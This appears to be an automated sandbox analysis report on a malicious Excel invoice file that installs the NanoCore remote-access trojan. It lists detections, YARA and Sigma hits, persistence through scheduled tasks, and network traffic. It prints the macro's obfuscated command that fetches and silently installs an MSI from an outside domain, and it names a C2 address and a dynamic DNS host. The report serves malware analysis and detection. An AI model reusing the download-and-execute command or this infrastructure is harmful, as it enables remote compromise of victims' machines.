Loading ...

Play interactive tourEdit tour

Analysis Report Overdue Invoices before 5-04-2020.xls

Overview

General Information

Sample Name:Overdue Invoices before 5-04-2020.xls
MD5:4a1b031536cb803ece7a69f6fdfcdb25
SHA1:0b860cf8fa06344a449fb4fdb7cad3a1d12c9df9
SHA256:410b37038436dfd621def737f102dce7ae9ac6a7c39323f9d0f4f48e72231334

Most interesting Screenshot:

Detection

Nanocore
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Nanocore Rat
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: NanoCore
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Nanocore RAT
.NET source code contains potential unpacker
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with many string operations indicating source code obfuscation
Document exploit detected (process start blacklist hit)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the context of a thread in another process (thread injection)
Obfuscated command line found
Sigma detected: Microsoft Office Product Spawning Windows Shell
Uses dynamic DNS services
Uses schtasks.exe or at.exe to add and modify task schedules
Antivirus or Machine Learning detection for unpacked file
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (unknown TCP traffic)
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7
  • EXCEL.EXE (PID: 3916 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 716335EDBB91DA84FC102425BFDA957E)
    • cmd.exe (PID: 3988 cmdline: 'C:\Windows\System32\cmd.exe' /C ms^iE^x^ec /i http://unifedslashclub.com/igm/rrraw.msi /qn MD5: AD7B9C14083B52BC532FBA5948342B98)
      • msiexec.exe (PID: 4036 cmdline: msiExec /i http://unifedslashclub.com/igm/rrraw.msi /qn MD5: 4315D6ECAE85024A0567DF2CB253B7B0)
  • MSIFBF6.tmp (PID: 2064 cmdline: C:\Windows\Installer\MSIFBF6.tmp MD5: A56ABA6661C6F1E9F3A8114C40D88C70)
    • MSIFBF6.tmp (PID: 2180 cmdline: {path} MD5: A56ABA6661C6F1E9F3A8114C40D88C70)
      • schtasks.exe (PID: 2184 cmdline: 'schtasks.exe' /create /f /tn 'WAN Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp927B.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
      • schtasks.exe (PID: 2080 cmdline: 'schtasks.exe' /create /f /tn 'WAN Service Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp9634.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
  • taskeng.exe (PID: 2232 cmdline: taskeng.exe {B623727B-AFE4-4B99-8F3C-68535BA9AAD4} S-1-5-21-290172400-2828352916-2832973385-1004:computer\user:Interactive:[1] MD5: 4F2659160AFCCA990305816946F69407)
    • MSIFBF6.tmp (PID: 2300 cmdline: C:\Windows\Installer\MSIFBF6.tmp 0 MD5: A56ABA6661C6F1E9F3A8114C40D88C70)
      • MSIFBF6.tmp (PID: 2388 cmdline: {path} MD5: A56ABA6661C6F1E9F3A8114C40D88C70)
      • MSIFBF6.tmp (PID: 2308 cmdline: {path} MD5: A56ABA6661C6F1E9F3A8114C40D88C70)
      • MSIFBF6.tmp (PID: 2512 cmdline: {path} MD5: A56ABA6661C6F1E9F3A8114C40D88C70)
    • wansv.exe (PID: 2356 cmdline: 'C:\Program Files\WAN Service\wansv.exe' 0 MD5: A56ABA6661C6F1E9F3A8114C40D88C70)
  • wansv.exe (PID: 2448 cmdline: 'C:\Program Files\WAN Service\wansv.exe' MD5: A56ABA6661C6F1E9F3A8114C40D88C70)
    • wansv.exe (PID: 2564 cmdline: {path} MD5: A56ABA6661C6F1E9F3A8114C40D88C70)
  • cleanup

Malware Configuration

Threatname: NanoCore

{"C2: ": ["185.244.30.216", "255.255.255.255"], "Version: ": "NanoCore Client, Version=1.2.2.0"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.1144452115.040A0000.00000004.00000001.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0x1f1db:$x1: NanoCore.ClientPluginHost
  • 0x1f1f5:$x2: IClientNetworkHost
00000006.00000002.1144452115.040A0000.00000004.00000001.sdmpNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
  • 0x1f1db:$x2: NanoCore.ClientPluginHost
  • 0x22518:$s4: PipeCreated
  • 0x1f1c8:$s5: IClientLoggingHost
00000006.00000002.1144254626.03E30000.00000004.00000001.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0x13a8:$x1: NanoCore.ClientPluginHost
00000006.00000002.1144254626.03E30000.00000004.00000001.sdmpNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
  • 0x13a8:$x2: NanoCore.ClientPluginHost
  • 0x1486:$s4: PipeCreated
  • 0x13c2:$s5: IClientLoggingHost
00000010.00000002.778516355.00402000.00000040.00000001.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0xff8d:$x1: NanoCore.ClientPluginHost
  • 0xffca:$x2: IClientNetworkHost
  • 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Click to see the 67 entries

Unpacked PEs

SourceRuleDescriptionAuthorStrings
6.2.MSIFBF6.tmp.3f50000.14.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0x1deb:$x1: NanoCore.ClientPluginHost
  • 0x1e24:$x2: IClientNetworkHost
6.2.MSIFBF6.tmp.3f50000.14.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
  • 0x1deb:$x2: NanoCore.ClientPluginHost
  • 0x1f36:$s4: PipeCreated
  • 0x1e05:$s5: IClientLoggingHost
6.2.MSIFBF6.tmp.3e30000.12.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0x13a8:$x1: NanoCore.ClientPluginHost
6.2.MSIFBF6.tmp.3e30000.12.raw.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
  • 0x13a8:$x2: NanoCore.ClientPluginHost
  • 0x1486:$s4: PipeCreated
  • 0x13c2:$s5: IClientLoggingHost
6.2.MSIFBF6.tmp.3f70000.15.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0x3d99:$x1: NanoCore.ClientPluginHost
  • 0x3db3:$x2: IClientNetworkHost
Click to see the 59 entries

Sigma Overview


System Summary:

barindex
Sigma detected: NanoCoreShow sources
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Installer\MSIFBF6.tmp, ProcessId: 2180, TargetFilename: C:\Users\user\AppData\Roaming\0F4F5130-48FA-4204-B1C4-585FBB81CD25\run.dat
Sigma detected: Scheduled temp file as task from temp locationShow sources
Source: Process startedAuthor: Joe Security: Data: Command: 'schtasks.exe' /create /f /tn 'WAN Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp927B.tmp', CommandLine: 'schtasks.exe' /create /f /tn 'WAN Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp927B.tmp', CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: {path}, ParentImage: C:\Windows\Installer\MSIFBF6.tmp, ParentProcessId: 2180, ProcessCommandLine: 'schtasks.exe' /create /f /tn 'WAN Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp927B.tmp', ProcessId: 2184
Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis: Data: Command: 'C:\Windows\System32\cmd.exe' /C ms^iE^x^ec /i http://unifedslashclub.com/igm/rrraw.msi /qn , CommandLine: 'C:\Windows\System32\cmd.exe' /C ms^iE^x^ec /i http://unifedslashclub.com/igm/rrraw.msi /qn , CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3916, ProcessCommandLine: 'C:\Windows\System32\cmd.exe' /C ms^iE^x^ec /i http://unifedslashclub.com/igm/rrraw.msi /qn , ProcessId: 3988

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Found malware configurationShow sources
Source: MSIFBF6.tmp.2512.16.memstrMalware Configuration Extractor: NanoCore {"C2: ": ["185.244.30.216", "255.255.255.255"], "Version: ": "NanoCore Client, Version=1.2.2.0"}
Multi AV Scanner detection for domain / URLShow sources
Source: unifedslashclub.comVirustotal: Detection: 10%Perma Link
Multi AV Scanner detection for submitted fileShow sources
Source: Overdue Invoices before 5-04-2020.xlsReversingLabs: Detection: 20%
Yara detected Nanocore RATShow sources
Source: Yara matchFile source: 00000010.00000002.778516355.00402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000006.00000002.1141230461.02937000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000002.750001957.02BC9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000012.00000002.808447398.00402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000006.00000002.1138226637.00402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000006.00000002.1143756620.03B70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000C.00000002.762486074.028D9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000010.00000002.784430727.029D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000012.00000002.810188013.01CB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000012.00000002.810240200.02CB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000E.00000002.762179363.029E9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000010.00000002.784111444.019D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000011.00000002.787203529.02B29000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000006.00000002.1143109529.0330F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: MSIFBF6.tmp PID: 2180, type: MEMORY
Source: Yara matchFile source: Process Memory Space: MSIFBF6.tmp PID: 2512, type: MEMORY
Source: Yara matchFile source: Process Memory Space: wansv.exe PID: 2564, type: MEMORY
Source: Yara matchFile source: 6.2.MSIFBF6.tmp.3b70000.5.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 18.2.wansv.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 16.2.MSIFBF6.tmp.400000.1.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 6.2.MSIFBF6.tmp.3b70000.5.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 6.2.MSIFBF6.tmp.400000.1.unpack, type: UNPACKEDPE
Machine Learning detection for dropped fileShow sources
Source: C:\Program Files\WAN Service\wansv.exeJoe Sandbox ML: detected
Machine Learning detection for sampleShow sources
Source: Overdue Invoices before 5-04-2020.xlsJoe Sandbox ML: detected
Source: 18.2.wansv.exe.400000.1.unpackAvira: Label: TR/Dropper.Gen
Source: 16.2.MSIFBF6.tmp.400000.1.unpackAvira: Label: TR/Dropper.Gen
Source: 6.2.MSIFBF6.tmp.400000.1.unpackAvira: Label: TR/Dropper.Gen

Software Vulnerabilities:

barindex
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exeJump to behavior
Source: C:\Windows\Installer\MSIFBF6.tmpCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]6_2_03D277D0
Source: C:\Windows\Installer\MSIFBF6.tmpCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]6_2_03D277C0
Source: C:\Windows\Installer\MSIFBF6.tmpCode function: 4x nop then mov esp, ebp6_2_03D243C8
Source: C:\Windows\Installer\MSIFBF6.tmpCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]6_2_03D2783A
Source: global trafficDNS query: name: unifedslashclub.com
Source: global trafficTCP traffic: 192.168.2.2:49160 -> 185.244.30.216:8417

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.2:49160 -> 185.244.30.216:8417
Uses dynamic DNS servicesShow sources
Source: unknownDNS query: name: socket-controller.ddns.net
Source: global trafficTCP traffic: 192.168.2.2:49160 -> 185.244.30.216:8417
Source: Joe Sandbox ViewASN Name: unknown unknown
Source: C:\Windows\Installer\MSIFBF6.tmpCode function: 6_2_014A2D76 WSARecv,6_2_014A2D76
Source: unknownDNS traffic detected: queries for: unifedslashclub.com
Source: MSIFBF6.tmp, 00000006.00000002.1140371657.01944000.00000004.00000001.sdmpString found in binary or memory: http://google.com
Source: msiexec.exe, 00000004.00000002.779594878.0019A000.00000004.00000010.sdmp, msiexec.exe, 00000004.00000002.779135357.00150000.00000004.00000040.sdmpString found in binary or memory: http://unifedslashclub.com/igm/rrraw.msi
Source: msiexec.exe, 00000004.00000002.780903388.00506000.00000004.00000040.sdmp, msiexec.exe, 00000004.00000002.779092020.00110000.00000004.00000040.sdmpString found in binary or memory: http://unifedslashclub.com/igm/rrraw.msi/qn
Source: msiexec.exe, 00000004.00000002.779135357.00150000.00000004.00000040.sdmpString found in binary or memory: http://unifedslashclub.com/igm/rrraw.msi/qns

Source: MSIFBF6.tmp, 00000006.00000002.1141230461.02937000.00000004.00000001.sdmpBinary or memory string: RegisterRawInputDevices

E-Banking Fraud:

barindex
Yara detected Nanocore RATShow sources
Source: Yara matchFile source: 00000010.00000002.778516355.00402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000006.00000002.1141230461.02937000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000002.750001957.02BC9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000012.00000002.808447398.00402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000006.00000002.1138226637.00402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000006.00000002.1143756620.03B70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000C.00000002.762486074.028D9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000010.00000002.784430727.029D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000012.00000002.810188013.01CB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000012.00000002.810240200.02CB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000E.00000002.762179363.029E9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000010.00000002.784111444.019D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000011.00000002.787203529.02B29000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000006.00000002.1143109529.0330F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: MSIFBF6.tmp PID: 2180, type: MEMORY
Source: Yara matchFile source: Process Memory Space: MSIFBF6.tmp PID: 2512, type: MEMORY
Source: Yara matchFile source: Process Memory Space: wansv.exe PID: 2564, type: MEMORY
Source: Yara matchFile source: 6.2.MSIFBF6.tmp.3b70000.5.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 18.2.wansv.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 16.2.MSIFBF6.tmp.400000.1.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 6.2.MSIFBF6.tmp.3b70000.5.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 6.2.MSIFBF6.tmp.400000.1.unpack, type: UNPACKEDPE

System Summary:

bar